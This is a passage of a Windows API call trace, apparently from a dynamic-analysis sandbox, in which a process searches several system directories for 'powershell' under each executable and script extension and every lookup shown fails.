	[0604.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.441] SetErrorMode (uMode=0x1) returned 0x1
	[0604.441] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.441] SetErrorMode (uMode=0x1) returned 0x1
	[0604.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0604.442] SetErrorMode (uMode=0x1) returned 0x1
	[0604.442] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.442] SetErrorMode (uMode=0x1) returned 0x1
	[0604.442] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.442] SetErrorMode (uMode=0x1) returned 0x1
	[0604.442] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.443] SetErrorMode (uMode=0x1) returned 0x1
	[0604.443] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.443] SetErrorMode (uMode=0x1) returned 0x1
	[0604.443] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.443] SetErrorMode (uMode=0x1) returned 0x1
	[0604.444] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.444] SetErrorMode (uMode=0x1) returned 0x1
	[0604.444] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.444] SetErrorMode (uMode=0x1) returned 0x1
	[0604.444] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.444] SetErrorMode (uMode=0x1) returned 0x1
	[0604.445] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.445] SetErrorMode (uMode=0x1) returned 0x1
	[0604.445] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.445] SetErrorMode (uMode=0x1) returned 0x1
	[0604.445] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.446] SetErrorMode (uMode=0x1) returned 0x1
	[0604.446] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.446] SetErrorMode (uMode=0x1) returned 0x1
	[0604.446] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.446] SetErrorMode (uMode=0x1) returned 0x1
	[0604.446] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.447] SetErrorMode (uMode=0x1) returned 0x1
	[0604.447] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.447] SetErrorMode (uMode=0x1) returned 0x1
	[0604.447] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.447] SetErrorMode (uMode=0x1) returned 0x1
	[0604.447] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.448] SetErrorMode (uMode=0x1) returned 0x1
	[0604.448] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.448] SetErrorMode (uMode=0x1) returned 0x1
	[0604.448] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.448] SetErrorMode (uMode=0x1) returned 0x1
	[0604.448] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.449] SetErrorMode (uMode=0x1) returned 0x1
	[0604.449] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.449] SetErrorMode (uMode=0x1) returned 0x1
	[0604.449] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.449] SetErrorMode (uMode=0x1) returned 0x1
	[0604.450] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.450] SetErrorMode (uMode=0x1) returned 0x1
	[0604.450] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.450] SetErrorMode (uMode=0x1) returned 0x1
	[0604.450] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.451] SetErrorMode (uMode=0x1) returned 0x1
	[0604.451] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.451] SetErrorMode (uMode=0x1) returned 0x1
	[0604.451] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.451] SetErrorMode (uMode=0x1) returned 0x1
	[0604.451] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.452] SetErrorMode (uMode=0x1) returned 0x1
	[0604.452] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.452] SetErrorMode (uMode=0x1) returned 0x1
	[0604.452] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0604.452] SetErrorMode (uMode=0x1) returned 0x1
	[0604.452] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.453] SetErrorMode (uMode=0x1) returned 0x1
	[0604.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.453] SetErrorMode (uMode=0x1) returned 0x1
	[0604.453] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.453] SetErrorMode (uMode=0x1) returned 0x1
	[0604.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.454] SetErrorMode (uMode=0x1) returned 0x1
	[0604.454] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.454] SetErrorMode (uMode=0x1) returned 0x1
	[0604.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.454] SetErrorMode (uMode=0x1) returned 0x1
	[0604.455] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.455] SetErrorMode (uMode=0x1) returned 0x1
	[0604.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.455] SetErrorMode (uMode=0x1) returned 0x1
	[0604.455] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.455] SetErrorMode (uMode=0x1) returned 0x1
	[0604.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.456] SetErrorMode (uMode=0x1) returned 0x1
	[0604.456] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.529] SetErrorMode (uMode=0x1) returned 0x1
	[0604.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.529] SetErrorMode (uMode=0x1) returned 0x1
	[0604.529] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.530] SetErrorMode (uMode=0x1) returned 0x1
	[0604.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.530] SetErrorMode (uMode=0x1) returned 0x1
	[0604.530] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.530] SetErrorMode (uMode=0x1) returned 0x1
	[0604.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.531] SetErrorMode (uMode=0x1) returned 0x1
	[0604.531] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.531] SetErrorMode (uMode=0x1) returned 0x1
	[0604.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.531] SetErrorMode (uMode=0x1) returned 0x1
	[0604.532] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.532] SetErrorMode (uMode=0x1) returned 0x1
	[0604.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.532] SetErrorMode (uMode=0x1) returned 0x1
	[0604.532] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.532] SetErrorMode (uMode=0x1) returned 0x1
	[0604.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.533] SetErrorMode (uMode=0x1) returned 0x1
	[0604.533] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.533] SetErrorMode (uMode=0x1) returned 0x1
	[0604.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0604.533] SetErrorMode (uMode=0x1) returned 0x1
	[0604.534] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0604.534] SetErrorMode (uMode=0x1) returned 0x1
	[0604.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0605.595] SetErrorMode (uMode=0x1) returned 0x1
	[0605.595] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.596] SetErrorMode (uMode=0x1) returned 0x1
	[0605.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0605.596] SetErrorMode (uMode=0x1) returned 0x1
